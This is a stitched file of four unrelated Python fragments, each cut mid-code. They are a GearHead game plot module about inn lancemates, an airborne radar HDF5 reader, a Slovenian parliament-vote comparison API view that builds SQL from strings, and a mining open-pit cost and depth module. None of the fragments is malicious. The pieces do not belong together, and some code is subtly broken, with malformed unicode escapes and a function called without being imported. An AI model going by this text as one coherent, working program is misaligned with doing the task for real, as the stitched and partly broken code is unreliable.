"Let me know if you need any help.", "Have you met the other cavaliers staying here?",
"I hope you enjoy your stay at the Bronze Horse Inn.",
"This is the best place in town to find lancemates."
]
return mygram
def TRAINER_offers(self, camp: gears.GearHeadCampaign):
mylist = list()
mylist.append(Offer(
"Let's get started. No pain, no gain.",
context=ContextTag((context.OPEN_SCHOOL,)), effect=self.training,
))
return mylist
# ********************************
# *** DZD_BHIRandomLancemate ***
# ********************************
#
# A random lancemate for the Bronze Horse Inn in Wujung.
class DZD_BHIRandomLancemate(Plot):
LABEL = "DZD_BHIRandomLancemate"
UNIQUE = True
def custom_init(self, nart):
npc = gears.selector.random_character(rank=random.randint(10, 50),
mecha_colors=gears.color.random_mecha_colors(),
local_tags=tuple(self.elements["LOCALE"].attributes),
combatant=True)
self.register_element("NPC", npc, dident=random.choice(("MUSEUM_TEAM","FOYER_TEAM")))
self.add_sub_plot(nart, "RLM_Relationship")
return True
class DZD_BHIAdventurer(Plot):
LABEL = "DZD_BHIRandomLancemate"
UNIQUE = True
JOBS = ("Soldier", "Mecha Pilot", "Scavenger", "Arena Pilot", "Martial Artist", "Test Pilot", "Mercenary")
def custom_init(self, nart):
npc = gears.selector.random_character(job=gears.jobs.ALL_JOBS[random.choice(self.JOBS)],
rank=random.randint(10, 50),
mecha_colors=gears.color.random_mecha_colors(),
local_tags=tuple(self.elements["LOCALE"].attributes),
combatant=True)
self.register_element("NPC", npc, dident="FOYER_TEAM")
self.add_sub_plot(nart, "RLM_Relationship")
return True
class DZD_BHIScout(Plot):
LABEL = "DZD_BHIRandomLancemate"
UNIQUE = True
JOBS = ("Bounty Hunter", "Recon Pilot", "Thief", "Explorer")
def custom_init(self, nart):
npc = gears.selector.random_character(job=gears.jobs.ALL_JOBS[random.choice(self.JOBS)],
rank=random.randint(10, 50),
mecha_colors=gears.color.random_mecha_colors(),
local_tags=tuple(self.elements["LOCALE"].attributes),
combatant=True)
self.register_element("NPC", npc, dident=random.choice(("MUSEUM_TEAM","FOYER_TEAM")))
self.add_sub_plot(nart, "RLM_Relationship")
return True
class DZD_BlueFortressHQ(Plot):
LABEL = "DZDHB_BlueFortress"
active = True
scope = "METRO"
# Compatibility var- for v0.540
got_tutorial = False
def custom_init(self, nart):
| |
beam filling (NUBF) offset used to correct Ku-band Doppler velocity (m/s)
- channel_mask (range, time): xarray.DataArray(int) - Composite image channel mask. 0: No signal, 1: Low-resolution pulse, 2: High-resolution pulse, 3: Chirp
- horizontal_resolution_ku (range) : xarray.DataArray(float) - Approximate horizontal resolution defined as width of spatial weighting after averaging as a function of radar range (m)
- dxdr (time) : xarray.DataArray(float) - Data cross-track distance from aircraft per radar range. Positive is starboard direction (m/m)
- dydr (time) : xarray.DataArray(float) - Data along-track distance from aircraft per radar range. Positive is forward direction (m/m)
- dzdr (time) : xarray.DataArray(float) - Data vertical distance from aircraft per radar range. Positive is upward direction (m/m)
- er2_altitude (time) : xarray.DataArray(float) - Aircraft height above sea level (m)
- er2_heading (time) : xarray.DataArray(float) - Aircraft heading in degrees from north. 90 degrees is eastward pointing (degrees)
- er2_pitch (time) : xarray.DataArray(float) - Aircraft pitch (degrees)
- er2_roll (time) : xarray.DataArray(float) - Aircraft roll (degrees)
- er2_drift (time) : xarray.DataArray(float) - Distance between track and heading (degrees)
- er2_EastVel (time) : xarray.DataArray(float) - Eastward component of velocity (m/s)
- er2_NorthVel (time) : xarray.DataArray(float) - Northward component of velocity (m/s)
- er2_upVel (time) : xarray.DataArray(float) - Upward velocity (m/s)
- er2_track (time) : xarray.DataArray(float) - Direction from motion in degrees from north. 90 degrees is eastward motion (degrees)
- er2_motion (time) : xarray.DataArray(float) - Estimated aircraft motion notmal to the beam, subtracted from Doppler estimate. Smoothed to a 2 second average motion (m/s)
Attribute Information:
Experiment, Date, Aircraft, Radar Name, Data Contact, Instrument PI, Mission PI, Antenna Size,
Antenna one-way 3dB beamwidth (degrees), Number of pulses, Radar transmit frequency (Hz), Radar transmit wavelength (m),
Range gate spacing (m), Nominal antenna pointing, PRI, vertical resolution
"""
# correct for 2-way path integrated attenuation
if atten_file is not None:
self.correct_attenuation(atten_file)
# mask values when aircraft is rolling
if max_roll is not None:
self.data = self.mask_roll(max_roll)
# despeckle
if dbz_sigma is not None:
self.data['dbz'] = self.despeckle(self.data['dbz'], dbz_sigma)
if vel_sigma is not None:
self.data['vel'] = self.despeckle(self.data['vel'], vel_sigma)
if width_sigma is not None:
self.data['width'] = self.despeckle(self.data['width'], width_sigma)
if ldr_sigma is not None:
self.data['ldr'] = self.despeckle(self.data['ldr'], ldr_sigma)
def readfile(self, filepath, start_time=None, end_time=None):
"""
Reads the CRS data file and unpacks the fields into an xarray.Dataset
Parameters
----------
filepath : str
Path to the data file
start_time : np.datetime64 or None
The initial time of interest
end_time : np.datetime64 or None
The final time of interest
Returns
-------
data : xarray.Dataset
The unpacked dataset
"""
# open the file
hdf = h5py.File(filepath, 'r')
# Time information -- this is the first dimension in nav coords and products
time_raw = hdf['Time']['Data']['TimeUTC'][:]
time_dt = [datetime(1970, 1, 1) + timedelta(seconds=time_raw[i]) for i in range(len(time_raw))] # Python datetime object
time_dt64 = np.array(time_dt, dtype='datetime64[ms]') # Numpy datetime64 object (e.g., for plotting)
if start_time is not None:
time_inds = np.where((time_dt64>=start_time) & (time_dt64<=end_time))[0]
else:
time_inds = np.where((time_dt64 != None))[0]
# Aircraft nav information
nomdist = xr.DataArray(
data = hdf['Navigation']['Data']['NominalDistance'][:],
dims = ["time"],
coords = dict(time=time_dt64),
attrs = dict(
description=hdf['Navigation']['Information']['NominalDistance_desciption'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['NominalDistance_units'][0].decode('UTF-8')
)
)
lat = xr.DataArray(
data = hdf['Navigation']['Data']['Latitude'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description = hdf['Navigation']['Information']['Latitude_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Latitude_units'][0].decode('UTF-8')
)
)
lon = xr.DataArray(
data = hdf['Navigation']['Data']['Longitude'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Longitude_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Longitude_units'][0].decode('UTF-8')
)
)
altitude = xr.DataArray(
data = hdf['Navigation']['Data']['Height'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Height_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Height_units'][0].decode('UTF-8')
)
)
heading = xr.DataArray(
data = hdf['Navigation']['Data']['Heading'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Heading_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Heading_units'][0].decode('UTF-8')
)
)
roll = xr.DataArray(
data = hdf['Navigation']['Data']['Roll'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Roll_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Roll_units'][0].decode('UTF-8')
)
)
pitch = xr.DataArray(
data = hdf['Navigation']['Data']['Pitch'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Pitch_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Pitch_units'][0].decode('UTF-8')
)
)
drift = xr.DataArray(
data = hdf['Navigation']['Data']['Drift'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Drift_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Drift_units'][0].decode('UTF-8')
)
)
eastVel = xr.DataArray(
data = hdf['Navigation']['Data']['EastVelocity'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['EastVelocity_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['EastVelocity_units'][0].decode('UTF-8')
)
)
northVel = xr.DataArray(
data = hdf['Navigation']['Data']['NorthVelocity'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['NorthVelocity_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['NorthVelocity_units'][0].decode('UTF-8')
)
)
track = xr.DataArray(
data = hdf['Navigation']['Data']['Track'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['Track_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['Track_units'][0].decode('UTF-8')
)
)
upvel = xr.DataArray(
data = hdf['Navigation']['Data']['UpVelocity'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['UpVelocity_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['UpVelocity_units'][0].decode('UTF-8')
)
)
dxdr = xr.DataArray(
data = hdf['Navigation']['Data']['dxdr'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['dxdr_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['dxdr_units'][0].decode('UTF-8')
)
)
dydr = xr.DataArray(
data = hdf['Navigation']['Data']['dydr'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['dydr_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['dydr_units'][0].decode('UTF-8')
)
)
dzdr = xr.DataArray(
data = hdf['Navigation']['Data']['dzdr'][:],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist),
attrs = dict(
description=hdf['Navigation']['Information']['dzdr_description'][0].decode('UTF-8'),
units = hdf['Navigation']['Information']['dzdr_units'][0].decode('UTF-8')
)
)
# Radar information
radar_range = hdf['Products']['Information']['Range'][:] # this is the second dimension on product data
[alt2d, radar_range2d] = np.meshgrid(altitude, radar_range)
hght = alt2d - radar_range2d
height = xr.DataArray(
data = hght[:],
dims = ['range', 'time'],
coords = dict(
range = radar_range,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description='Height of each radar range gate',
units='m'
)
)
dbz = xr.DataArray(
data = hdf['Products']['Data']['dBZe'][:].T,
dims = ["range", "time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['dBZe_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['dBZe_units'][0].decode('UTF-8')
)
)
width = xr.DataArray(
data = np.ma.masked_invalid(hdf['Products']['Data']['SpectrumWidth'][:].T),
dims = ["range", "time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['SpectrumWidth_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['SpectrumWidth_units'][0].decode('UTF-8')
)
)
if 'Velocity_corrected' in list(hdf['Products']['Data'].keys()):
# for NUBF correction
vel = xr.DataArray(
data = hdf['Products']['Data']['Velocity_corrected'][:].T,
dims = ["range", "time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['Velocity_corrected_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['Velocity_corrected_units'][0].decode('UTF-8')
)
)
else:
vel = xr.DataArray(
data = hdf['Products']['Data']['Velocity'][:].T,
dims = ["range", "time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['Velocity_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['Velocity_units'][0].decode('UTF-8')
)
)
aircraft_motion = xr.DataArray(
data = hdf['Products']['Information']['AircraftMotion'][:,0],
dims = ["time"],
coords = dict(
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['AircraftMotion_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['AircraftMotion_units'][0].decode('UTF-8')
)
)
mask_copol = xr.DataArray(
data = hdf['Products']['Information']['MaskCoPol'][:].T,
dims = ["range","time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description = hdf['Products']['Information']['MaskCoPol_description'][0].decode('UTF-8'),
)
)
horiz_resolution = xr.DataArray(
data = hdf['Products']['Information']['ResolutionHorizontal6dB'][:],
dims = ["range"],
coords = dict(
range = radar_range),
attrs = dict(
description=hdf['Products']['Information']['ResolutionHorizontal6dB_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['ResolutionHorizontal6dB_units'][0].decode('UTF-8')
)
)
vel_horizwind_offset = xr.DataArray(
data = hdf['Products']['Information']['Velocity_horizwind_offset'][:].T,
dims = ["range","time"],
coords = dict(
range = radar_range,
height = height,
time = time_dt64,
distance = nomdist,
lat = lat,
lon = lon),
attrs = dict(
description=hdf['Products']['Information']['Velocity_horizwind_offset_description'][0].decode('UTF-8'),
units = hdf['Products']['Information']['Velocity_horizwind_offset_units'][0].decode('UTF-8')
)
)
# get meta data for attributes
aircraft = hdf['Information']['Aircraft'][0].decode('UTF-8')
dataContact = hdf['Information']['DataContact'][0].decode('UTF-8')
experiment | |
this vote
* @apiSuccess {Integer} results.results.abstain Number of abstentions
* @apiSuccess {Integer} results.results.against Number of MPs who voted against the motion
* @apiSuccess {Integer} results.results.not_present Number of MPs who weren't present at the vote
* @apiSuccess {Integer} results.results.votes_for Number of MPs who voted for the motion
* @apiSuccess {date} results.results.date The date of the vote
* @apiSuccess {String} results.results.text The text of the motion which was voted upon
* @apiSuccess {String[]} results.results.tags List of tags that belong to this motion
* @apiSuccess {Boolean} results.results.is_outlier Is this vote a weird one (flame icon)?
* @apiSuccess {Boolean} results.results.result Did the motion pass?
* @apiExample {curl} Example:
curl -i https://analize.parlameter.si/v1/s/getComparedVotes/?people_same=&parties_same=1&people_different=&parties_different=2
* @apiSuccessExample {json} Example response:
{
"total": 2155,
"results": [{
"session": {
"name": "44. <NAME>",
"date_ts": "2017-05-30T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
}],
"date": "30. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
},
"id": 9587,
"in_review": false
},
"results": {
"abstain": 0,
"against": 0,
"motion_id": 7260,
"date": "09.06.2017",
"text": "Dnevni red v celoti",
"tags": ["Proceduralna glasovanja"],
"is_outlier": false,
"not_present": 34,
"votes_for": 56,
"result": true
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-30T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
}],
"date": "30. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
},
"id": 9587,
"in_review": false
},
"results": {
"abstain": 0,
"against": 34,
"motion_id": 7258,
"date": "09.06.2017",
"text": "Priporo\u010dilo Vladi RS v zvezi z okoljsko katastrofo, ki jo je povzro\u010dil po\u017ear v podjetju Kemis d.o.o. - Amandma: k 5. to\u010dki 9.6.2017 [SDS - Poslanska skupina Slovenske demokratske stranke]",
"tags": ["Odbor za infrastrukturo, okolje in prostor"],
"is_outlier": false,
"not_present": 35,
"votes_for": 21,
"result": false
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-22T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
}],
"date": "22. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
},
"id": 9580,
"in_review": true
},
"results": {
"abstain": 4,
"against": 18,
"motion_id": 7219,
"date": "30.05.2017",
"text": "Zakon o dopolnitvi Zakona o omejevanju uporabe toba\u010dnih in povezanih izdelkov - Glasovanje o zakonu v celoti",
"tags": ["Odbor za zdravstvo"],
"is_outlier": false,
"not_present": 16,
"votes_for": 52,
"result": true
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-22T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
}],
"date": "22. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
},
"id": 9580,
"in_review": true
},
"results": {
"abstain": 6,
"against": 23,
"motion_id": 7218,
"date": "30.05.2017",
"text": "Zakon o spremembah in dopolnitvah Zakona o zdravstveni dejavnosti - Eviden\u010dni sklep o primernosti predloga zakona 30.5.2017",
"tags": ["Odbor za zdravstvo"],
"is_outlier": false,
"not_present": 19,
"votes_for": 42,
"result": true
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-22T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
}],
"date": "22. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
},
"id": 9580,
"in_review": true
},
"results": {
"abstain": 6,
"against": 23,
"motion_id": 7218,
"date": "30.05.2017",
"text": "Zakon o spremembah in dopolnitvah Zakona o zdravstveni dejavnosti - Eviden\u010dni sklep o primernosti predloga zakona 30.5.2017",
"tags": ["Odbor za zdravstvo"],
"is_outlier": false,
"not_present": 19,
"votes_for": 42,
"result": true
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-22T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
}],
"date": "22. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u017<NAME>"
},
"id": 9580,
"in_review": true
},
"results": {
"abstain": 3,
"against": 22,
"motion_id": 7217,
"date": "30.05.2017",
"text": "Priporo\u010dilo v zvezi s problematiko slovenskega zdravstva - Eviden\u010dni sklep MDT 30.5.2017",
"tags": ["Odbor za zdravstvo"],
"is_outlier": false,
"not_present": 14,
"votes_for": 51,
"result": true
}
}, {
"session": {
"name": "<NAME>",
"date_ts": "2017-05-22T02:00:00",
"orgs": [{
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
}],
"date": "22. 5. 2017",
"org": {
"acronym": "DZ",
"is_coalition": false,
"id": 95,
"name": "Dr\u01<NAME>"
},
"id": 9580,
"in_review": true
},
"results": {
"abstain": 2,
"against": 51,
"motion_id": 7216,
"date": "30.05.2017",
"text": "Zakon o spremembah in dopolnitvah Zakona o pokojninskem in invalidskem zavarovanju - Eviden\u010dni sklep o primernosti predloga zakona 30.5.2017",
"tags": ["Odbor za delo, dru\u017eino, socialne zadeve in invalide"],
"is_outlier": false,
"not_present": 13,
"votes_for": 24,
"result": false
}
}]
}
"""
people_same = request.GET.get('people_same')
parties_same = request.GET.get('parties_same')
people_different = request.GET.get('people_different')
parties_different = request.GET.get('parties_different')
if people_same != '':
people_same_list = people_same.split(',')
else:
people_same_list = []
if parties_same != '':
parties_same_list = parties_same.split(',')
else:
parties_same_list = []
if people_different != '':
people_different_list = people_different.split(',')
else:
people_different_list = []
if parties_different != '':
parties_different_list = parties_different.split(',')
else:
parties_different_list = []
if len(people_same_list) + len(parties_same_list) == 0:
return HttpResponse('Need at least one same to compare.')
if len(people_same_list) + len(parties_same_list) < 2 and len(people_different_list) + len(parties_different_list) < 1:
return HttpResponse('Not enough to compare.')
beginning = 'SELECT * FROM '
select_same_people = ''
select_same_parties = ''
match_same_people_ballots = ''
match_same_people_persons = ''
match_same_people_options = ''
match_same_parties_ballots = ''
match_same_parties_organizations = ''
match_same_parties_options = ''
select_different_people = ''
select_different_parties = ''
match_different_people_ballots = ''
match_different_people_persons = ''
match_different_people_options = ''
match_different_parties_ballots = ''
match_different_parties_organizations = ''
match_different_parties_options = ''
# select for same people DONE
for i, e in enumerate(people_same_list):
if i < len(people_same_list) - 1:
select_same_people = '%s parlaseje_ballot b%s, parlaseje_activity a%s, parlaposlanci_person p%s, ' % (select_same_people, str(i), str(i), str(i))
else:
select_same_people = '%s parlaseje_ballot b%s, parlaseje_activity a%s, parlaposlanci_person p%s' % (select_same_people, str(i), str(i), str(i))
# select for same parties DONE
for i, e in enumerate(parties_same_list):
if i < len(parties_same_list) - 1:
select_same_parties = '%s parlaseje_ballot pb%s, parlaskupine_organization o%s, ' % (select_same_parties, str(i), str(i))
else:
select_same_parties = '%s parlaseje_ballot pb%s, parlaskupine_organization o%s' % (select_same_parties, str(i), str(i))
# select for different people DONE
for i, e in enumerate(people_different_list):
if i < len(people_different_list) - 1:
select_different_people = '%s parlaseje_ballot db%s, parlaseje_activity da%s, parlaposlanci_person dp%s, ' % (select_different_people, str(i), str(i), str(i))
else:
select_different_people = '%s parlaseje_ballot db%s, parlaseje_activity da%s, parlaposlanci_person dp%s' % (select_different_people, str(i), str(i), str(i))
# select for different parties DONE
for i, e in enumerate(parties_different_list):
if i < len(parties_different_list) - 1:
select_different_parties = '%s parlaseje_ballot dpb%s, parlaskupine_organization do%s, ' % (select_different_parties, str(i), str(i))
else:
select_different_parties = '%s parlaseje_ballot dpb%s, parlaskupine_organization do%s' % (select_different_parties, str(i), str(i))
# match same people ballots by vote id DONE
# if only one person was passed, match_same_people_ballots will remain an empty string
for i, e in enumerate(people_same_list):
if i != 0:
if i < len(people_same_list) - 1:
match_same_people_ballots = '%s b0.vote_id = b%s.vote_id AND ' % (match_same_people_ballots, str(i))
else:
match_same_people_ballots = '%s b0.vote_id = b%s.vote_id' % (match_same_people_ballots, str(i))
# match same parties ballots by vote id DONE
# if only one same party was passed match_same_parties_ballots will remain an empty string
if len(people_same_list) == 0:
# no same people were passed to the API
pass
if len(parties_same_list) == 0:
# no same parties were passed
return HttpResponse('You need to pass at least one "same" person or party.')
elif len(parties_same_list) == 1:
# only one same party was passed, there is nothing to match yet
match_same_parties_ballots = ''
else:
# more than one same party was passed
for i, e in enumerate(parties_same_list):
if i != 0:
# ignore the first one, because all others will be compared with it
if i < len(parties_same_list) - 1:
# not last
match_same_parties_ballots = '%s pb0.vote_id = pb%s.vote_id AND ' % (match_same_parties_ballots, str(i))
else:
# last
match_same_parties_ballots = '%s pb0.vote_id = pb%s.vote_id' % (match_same_parties_ballots, str(i))
elif len(people_same_list) > 0:
# one or more same people were passed
for i, e in enumerate(parties_same_list):
# do not ignore the first one, because all will be compared to the first person ballot
if i < len(parties_same_list) - 1:
# not last
match_same_parties_ballots = '%s b0.vote_id = pb%s.vote_id AND ' % (match_same_parties_ballots, str(i))
else:
# last
match_same_parties_ballots = '%s b0.vote_id = pb%s.vote_id' % (match_same_parties_ballots, str(i))
# match same people with | |
<reponame>bluetyson/bluecap<filename>bluecappy3/Managers/MiningSystemDataManager.py
"""
Copyright (C) 2019, Monash University, Geoscience Australia
Copyright (C) 2018, <NAME>
Bluecap is released under the Apache License, Version 2.0 (the "License");
you may not use this software except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
The project uses third party components which may have different licenses.
Please refer to individual components for more details.
"""
import numpy as np
from scipy.optimize import brentq
# Common
from Common.Common import Todo
# IO
from IO.XML import HasChild,GetChild,AddChild
from IO.XML import GetAttributeString,GetAttributeValue, SetAttributeString
#Units
from Units.UnitManager import UnitManager
#Functions
from Functions.FunctionManager import FunctionManager
class MiningSystemDataManager():
"""
This class holds information representing the mining system.
Note it is a subset of the Mine data manager, which holds information about the mining operation, processing/milling and infrastructure.
"""
def __init__(self):
"""
Create an empty mining system data manager and default variables.
"""
self.miningMethod = ""
self.mineLife = 0
self.mineCapacity = 0.0
self.mineOreProductionCapacity = 0.0
self.orebodyMass = 0.0
self.oreMined = np.array([0.0])
self.dilution = 0.05
self.wasteMined = np.array([0.0])
self.miningCapex = np.array([0.0])
self.miningOpex = np.array([0.0])
self.depths = np.array([0.0])
self.rampGrade = 0.1
self.alpha = 40*np.pi/180 # pit slope angle
self.mineStartupTime = 0 # in years
self.actualMineStartupTime = 0.0
self.miningMethod = "OC"
theUnitManager = UnitManager()
self.ugHaulCostPerDepth = theUnitManager.ConvertToBaseUnits("0.0073 AUD/tonne/m")
def ParseXMLNode(self, miningSystemNode):
"""
Generate mining system data from xml tree node.
- Note this may not be needed in many cases as the mining system is derived from the orebody shape
"""
if(HasAttribute(miningSystemNode,"alpha")):
self.alpha = GetAttributeValue(miningSystemNode,"alpha")
return miningSystemNode
def UpdateOpenPitDepth(self,w,l,d,excavatedVol,alpha):
cotAlpha = 1.0/np.tan(alpha)
func = lambda newD : w*l*(newD-d) + (w+l)*cotAlpha * (newD **2 - d**2) + np.pi/3 * cotAlpha**2 *(newD**3 - d**3) - excavatedVol
dmax = d+excavatedVol/float(w*l) # might be able to improve bound by using 2nd order terms
theNewD = brentq(func,d,dmax) # using current d as lower bound
return theNewD
def UpdateSlopedOpenPitDepth(self,w,l,d,excavatedVol,alpha,beta):
cotAlpha = 1.0/np.tan(alpha)
cotBeta = 1.0/np.tan(beta)
func = lambda newD : w*l*newD - (w-(cotBeta-cotAlpha)*(newD-d))*l*d\
+ (w+0.5*l)*cotAlpha * newD **2 - (0.5*l+w-(cotBeta-cotAlpha)*(newD-d))*cotAlpha*d**2 \
+ np.pi/6 * cotAlpha**2 *(newD**3 - d**3) - excavatedVol
dmax = d+excavatedVol/float(w*l) # might be able to improve by using 2nd order
theNewD = brentq(func,d,dmax)
return theNewD
def UpdateOpenPitDepthAndOreFraction(self,w,l,d,excavatedVol,alpha):
dd = self.UpdateOpenPitDepth(w,l,d,excavatedVol,alpha)
oreFraction = (dd-d)*w*l/excavatedVol
return dd,oreFraction
def UpdateSlopedOpenPitDepthAndOreFraction(self,w,l,d,excavatedVol,alpha,beta):
dd = self.UpdateSlopedOpenPitDepth(w,l,d,excavatedVol,alpha,beta)
oreFraction = (dd-d)*w*l/excavatedVol
return dd,oreFraction
###
def OpenPitExcavatedVolume(self,w,l,d,newD,alpha):
"""
Excavated volume between depths d and newD for an open pit with an orebody of width w, length l and pit slope alpha
"""
cotAlpha = 1.0/np.tan(alpha)
excavatedVolume = w*l*(newD-d) + (w+l)*cotAlpha * (newD **2 - d**2) + np.pi/3 * cotAlpha**2 *(newD**3 - d**3)
return excavatedVolume
def OpenPitOreFraction(self,w,l,d,newD,alpha):
"""
Fraction of ore excavated between depths d and newD for an open pit with an orebody of width w, length l and pit slope alpha
"""
orefrac = w*l*(newD-d)/(self.OpenPitExcavatedVolume(w,l,d,newD,alpha)+1e-64)
return orefrac
def OpenPitMarginalOreFraction(self,w,l,newD,alpha):
"""
Fraction of ore excavated at depth newD for an open pit with an orebody of width w, length l and pit slope alpha
"""
cotAlpha = 1.0/np.tan(alpha)
borderWidth = newD*cotAlpha
excavatedArea = w*l + (w+l)*borderWidth + np.pi * borderWidth**2
orefrac = w*l/excavatedArea
return orefrac
def RequiredTotalCapacity(self,oreProductionRate, w,l,d,newD,alpha):
"""
Mining capacity (total material moved) to maintain a given ore production rate between depths d and newd for an open pit with an orebody of width w, length l and pit slope alpha
"""
oreFrac = self.OpenPitOreFraction(w,l,d,newD,alpha)
totalCapacity = oreProductionRate/(oreFrac + 1e-64)
return totalCapacity
def MarginalCostAtDepthPerUnitOre(self,costAtDepthPerUnitMaterial, w,l,newD,alpha):
"""
Marginal cost per unit ore at depth newd for an open pit with an orebody of width w, length l and pit slope alpha
"""
marginalOreFrac = self.OpenPitMarginalOreFraction(w,l,newD,alpha)
costAtDepthPerUnitOre = costAtDepthPerUnitMaterial/(marginalOreFrac + 1e-64)
return costAtDepthPerUnitOre
def FindOPMarginalOreCostAtDepth(self,oreProductionRate, w,l,d,newD,alpha,materialCostFunc ):
"""
Find marginal cost at depth per unit ore from a material cost function based on the mine capacity in terms of total material mined
"""
totalCapacity = self.RequiredTotalCapacity(oreProductionRate, w,l,d,newD,alpha)
theUnitManager = UnitManager()
costAtDepthPerUnitMaterial = materialCostFunc.f([totalCapacity *theUnitManager.ConvertTo("1e6 tonne") ])
marginalcostAtDepth = self.MarginalCostAtDepthPerUnitOre(costAtDepthPerUnitMaterial, w,l,newD,alpha)
return marginalcostAtDepth
def FindOpUgSwitchingDepth(self,oreProductionRate, w,l,d,maxD,alpha,materialCostFunc,ugMaterialCost, ugMaterialCostPerTonMDepth ):
"""
Find switching depth between an open pit and underground mine
"""
func = lambda newD : ugMaterialCost + ugMaterialCostPerTonMDepth*(newD-60) - self.FindOPMarginalOreCostAtDepth(oreProductionRate, w,l,d,newD,alpha,materialCostFunc )
theSwitchingDepth = maxD
if func(theSwitchingDepth) < 0:
theSwitchingDepth = brentq(func,d,maxD)
return theSwitchingDepth
###
###
def DetermineMiningSystem(self, problemManager, mineManager):
"""
Use available data to determine the most likely mining method/capacity/opex etc.
"""
flatPlunge = 20 * np.pi/180.
steepPlunge = 55 * np.pi/180.
theUnitManager = UnitManager()
narrowWidth = theUnitManager.ConvertToBaseUnits("10m")
thickWidth = theUnitManager.ConvertToBaseUnits("30m")
# Thick > 30 m
